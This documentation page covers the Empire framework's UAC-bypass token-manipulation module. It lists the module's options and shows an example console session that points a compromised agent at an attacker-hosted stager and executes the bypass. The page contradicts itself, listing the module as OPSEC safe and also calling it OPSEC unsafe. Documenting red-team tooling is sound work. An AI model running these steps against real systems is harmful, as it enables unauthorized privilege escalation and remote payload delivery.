Invoke-BypassUACTokenManipulation - Empire Module

This page contains detailed information about how to use the powershell/privesc/bypassuac_tokenmanipulation Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview

---

Name: Invoke-BypassUACTokenManipulation
Module: powershell/privesc/bypassuac_tokenmanipulation
Source code [1]: empire/server/modules/powershell/privesc/bypassuac_tokenmanipulation.yaml
Source code [2]: empire/server/modules/powershell/privesc/bypassuac_tokenmanipulation.py
MITRE ATT&CK: T1088
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: No

The bypassuac_tokenmanipulation module bypass UAC module based on the script released by Matt Nelson @enigma0x3 at Derbycon 2017.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the bypassuac_tokenmanipulation module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options

---

This is a list of options that are required by the bypassuac_tokenmanipulation module:

Agent
Agent to elevate from.

Host
Host or IP where stager is served.

Port
Port to connect to where stager is served.

Stager
Stager file that you have hosted.
Default value: update.php.

Additional Module Options

---

This is a list of additional options that are supported by the bypassuac_tokenmanipulation module:

Proxy
Proxy to use for request (default, none, or other).
Default value: default.

ProxyCreds
Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
Default value: default.

UserAgent
UserAgent for staging process.
Default value: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko.

Bypassuac_tokenmanipulation Example Usage

---

Here's an example of how to use the bypassuac_tokenmanipulation module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/privesc/bypassuac_tokenmanipulation

 Author       @enigma0x3,@424f424f                                          
 Background   False                                                         
 Comments     https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-  
              Stuff/master/Invoke-TokenDuplication.ps1                      
 Description  Bypass UAC module based on the script released by Matt Nelson 
              @enigma0x3 at Derbycon 2017                                   
 Language     powershell                                                    
 Name         powershell/privesc/bypassuac_tokenmanipulation                
 NeedsAdmin   False                                                         
 OpsecSafe    True                                                          
 Techniques   http://attack.mitre.org/techniques/T1088                      


,Record Options------------------------------------,----------,-------------------------------------,
| Name       | Value                               | Required | Description                         |
|------------|-------------------------------------|----------|-------------------------------------|
| Agent      |                                     | True     | Agent to elevate from.              |
|------------|-------------------------------------|----------|-------------------------------------|
| Host       |                                     | True     | Host or IP where stager is served.  |
|------------|-------------------------------------|----------|-------------------------------------|
| Port       |                                     | True     | Port to connect to where stager is  |
|            |                                     |          | served                              |
|------------|-------------------------------------|----------|-------------------------------------|
| Proxy      | default                             | False    | Proxy to use for request (default,  |
|            |                                     |          | none, or other).                    |
|------------|-------------------------------------|----------|-------------------------------------|
| ProxyCreds | default                             | False    | Proxy credentials                   |
|            |                                     |          | ([domain\]username:password) to use |
|            |                                     |          | for request (default, none, or      |
|            |                                     |          | other).                             |
|------------|-------------------------------------|----------|-------------------------------------|
| Stager     | update.php                          | True     | Stager file that you have hosted.   |
|------------|-------------------------------------|----------|-------------------------------------|
| UserAgent  | Mozilla/5.0 (Windows NT 6.1; WOW64; | False    | UserAgent for staging process       |
|            | Trident/7.0; rv:11.0) like Gecko    |          |                                     |
'------------'-------------------------------------'----------'-------------------------------------'

(Empire: usemodule/powershell/privesc/bypassuac_tokenmanipulation) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/privesc/bypassuac_tokenmanipulation) > set Host value
[*] Set Host to value
(Empire: usemodule/powershell/privesc/bypassuac_tokenmanipulation) > set Port value
[*] Set Port to value
(Empire: usemodule/powershell/privesc/bypassuac_tokenmanipulation) > set Stager update.php
[*] Set Stager to update.php
(Empire: usemodule/powershell/privesc/bypassuac_tokenmanipulation) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Authors

---

• @enigma0x3
• @424f424f

References

---

• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/privesc/bypassuac_tokenmanipulation.yaml
• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/privesc/bypassuac_tokenmanipulation.py
• https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-TokenDuplication.ps1
• http://attack.mitre.org/techniques/T1088

See Also

---

Check also the following modules related to this module:

• powershell/privesc/bypassuac_env
• powershell/privesc/bypassuac_wscript
• powershell/privesc/bypassuac_eventvwr
• powershell/privesc/bypassuac_sdctlbypass
• powershell/privesc/bypassuac_fodhelper
• powershell/privesc/bypassuac
• powershell/privesc/winPEAS
• powershell/privesc/sweetpotato
• powershell/privesc/tater
• powershell/privesc/ms16-135
• powershell/privesc/ask
• powershell/privesc/mcafee_sitelist
• powershell/privesc/privesccheck
• powershell/privesc/sherlock
• powershell/privesc/ms16-032
• powershell/privesc/zerologon
• powershell/privesc/printdemon
• powershell/privesc/getsystem
• powershell/privesc/gpp
• powershell/privesc/watson
• powershell/privesc/printnightmare
• powershell/privesc/powerup/service_exe_useradd
• powershell/privesc/powerup/write_dllhijacker
• powershell/privesc/powerup/service_stager
• powershell/privesc/powerup/service_exe_restore
• powershell/privesc/powerup/service_exe_stager
• powershell/privesc/powerup/find_dllhijack
• powershell/privesc/powerup/service_useradd
• powershell/privesc/powerup/allchecks

Version

---

This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.